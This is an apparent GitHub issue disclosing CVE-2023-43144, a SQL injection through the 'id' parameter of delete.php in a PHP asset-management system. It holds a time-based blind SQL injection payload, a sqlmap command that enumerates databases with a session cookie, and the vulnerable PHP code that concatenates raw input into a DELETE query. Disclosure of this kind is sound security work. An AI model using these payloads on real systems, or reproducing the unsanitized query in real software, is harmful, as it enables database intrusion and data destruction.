Headline
CVE-2023-43144: SQL Injection vulnerability via the "id" parameter in delete.php · Issue #2 · projectworldsofficial/Assets-management-system-in-php
Projectworldsl Assets-management-system-in-php 1.0 is vulnerable to SQL Injection via the “id” parameter in delete.php.
Steps to reproduce
- Create new account
- Add new asset
- Click on delete asset
- Intercept the request and insert the payload in the value of parameter.
- Forward the request
Payload:
http://localhost/delete.php?id=4 AND (SELECT 8445 FROM (SELECT(SLEEP(5)))pmFJ)
PoC
sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch
Code review
function delete_data($con,$id){
$query = "DELETE FROM `assets` WHERE `id`= $id";
mysqli_query($con,$query);
}
The code constructs an SQL query using the id obtained from the user input, and then executes the query using mysqli_query
<?php include 'core/init.php’;
$id = $_GET[‘id’];
delete_data($con,$id);
header(‘location:home.php’);
There is no validation or sanitization of the $id variable. It means that any value provided by a user as the id parameter, will be directly used in the SQL query
Author
Pegasus (@Pegasus0xx)